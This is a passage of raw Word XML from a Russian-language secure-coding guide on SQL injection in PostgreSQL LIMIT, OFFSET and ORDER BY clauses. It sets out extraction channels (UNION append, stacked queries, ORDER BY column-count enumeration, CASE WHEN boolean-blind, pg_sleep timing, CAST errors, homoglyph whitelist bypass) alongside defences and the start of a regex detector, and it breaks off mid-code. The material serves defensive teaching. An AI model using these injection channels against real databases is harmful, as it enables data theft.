    <w:p w14:paraId="7AD56E35" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Docs: «Conditional Expressions» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/functions-conditional.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F1EDAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Docs: «Delaying Execution» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/functions-datetime.html#FUNCTIONS-DATETIME-DELAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2437DA98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PortSwigger: «Blind SQL injection» / «Conditional responses» — https://portswigger.net/web-security/sql-injection/blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC9BD68" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   OWASP: «Blind SQL Injection» — https://owasp.org/www-community/attacks/Blind_SQL_Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F73FD80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   SQLAlchemy Docs: «Selecting ORM Entities and Attributes» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>order_by()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://docs.sqlalchemy.org/en/20/orm/queryguide/query.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD0CC3F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари: категория 3.14 LIMIT / OFFSET / ORDER BY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3838884B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Категория 3.14 покрывает injection в специфичных clause-контекстах PostgreSQL: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OFFSET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (integer-context), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY column_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (identifier-context), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY column_number</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (integer в select-list reference), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (expression)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (full expression). Четыре подраздела разбирают одну общую ошибку — «эти clauses не нуждаются в bind-параметризации» — с разными последствиями: от UNION-extraction до boolean-blind через row order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD18560" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Главный тезис категории: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ни один из этих clauses не безопасен по умолчанию</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. LIMIT/OFFSET принимают expression (subquery → boolean/time-leak), ORDER BY column_name требует identifier-quoting (bind не работает), ORDER BY column_number </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>даёт error-channel column-count, ORDER BY expression — полноценная SQL injection с row-order как boolean-каналом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF6B5CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Подразделы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A9521E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.1 LIMIT/OFFSET integer-context</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT {limit}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через f-string без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-cast. UNION-канал (через append </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), stacked queries в simple-protocol, error-leak через subquery в LIMIT-position. Защита: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + bind-параметр.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BFF7CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.2 ORDER BY column_name token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY {sort}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без whitelist + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Bind физически не работает для identifier (протокольное ограничение). Bypass whitelist через Unicode homoglyphs (Cyrillic 'а' vs Latin 'a'). Защита: Enum + ORM ИЛИ whitelist + ASCII-check + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"..."</w:t>
      </w:r>
      <w:r>
        <w:t>-quoting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7792686F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.3 ORDER BY column_number</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — кажется безопаснее column_name, но создаёт error-канал через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY 99</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>position N is not in select list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (column-count enumeration для UNION-extraction). Также допускает stacked и expression-injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> skipping integer-check. Защита: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Query(ge=1, le=N)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BD58FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.4 ORDER BY (CASE WHEN ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — full expression-context. Boolean-blind через row-order (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (CASE WHEN cond THEN colA ELSE colB END)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), time-channel через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в expression, error-channel через subquery с CAST. Защита: decompose sort-spec в tokens, validate каждый, build expression server-side через ORM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690BED0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Сводная таблица: четыре поверхности 3.14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9479F" w14:paraId="5C9A43A0"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991F154"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EE3E2AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Clause</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77C0BC5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Контекст</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CDC673E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Канал извлечения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E71BE32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Защита</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0943CFFA"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214B8F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.14.1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5C7F26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>LIMIT N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>OFFSET 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86923F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>integer-literal (expression-allowed)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A552A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UNION (через append), stacked, subquery-error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5FB8DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>int()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + bind </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5702F20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8E6D8F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.14.2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DC238" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ORDER BY col_name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E0ABD3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>identifier-token (bind не работает)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2C6A17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>stacked, append-UNION, Unicode bypass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EE9CD2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Enum + ORM ИЛИ whitelist + ASCII + quote</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="597C49C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0D07DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.14.3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F357AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ORDER BY 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76FF4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>integer-literal (column-position)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2D386A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">error-канал column-count, stacked, expression-bypass через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>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DA159F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>int()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Query(ge=1, le=N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="31A5CB67"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2843E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.14.4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C17CC8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ORDER BY (expr)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DD07A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>arbitrary expression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7A98D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>row-order boolean, pg_sleep time, CAST error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45178F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>decompose + validate + ORM-compose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4078EB09" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Хук для rules.py: класс LIMIT_ORDER_INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DD9015" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># rules.py фрагмент — детекция injection в LIMIT/OFFSET/ORDER BY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED7156" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0721C5E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B1608B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT_ORDER_INJECTION_PATTERNS = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D18E7B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.14.1: f-string / concat в LIMIT/OFFSET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32540AA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bLIMIT\s+\{[a-z_][a-z0-9_]*\}", re.IGNORECASE),       # f"LIMIT {var}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D29A02D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bLIMIT\s+['\"]\s*\+\s*\w+", re.IGNORECASE),           # "LIMIT " + var</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F2D3B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bOFFSET\s+\{[a-z_][a-z0-9_]*\}", re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAFCBA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5924686F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.14.2: f-string / concat в ORDER BY с identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C74EF3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
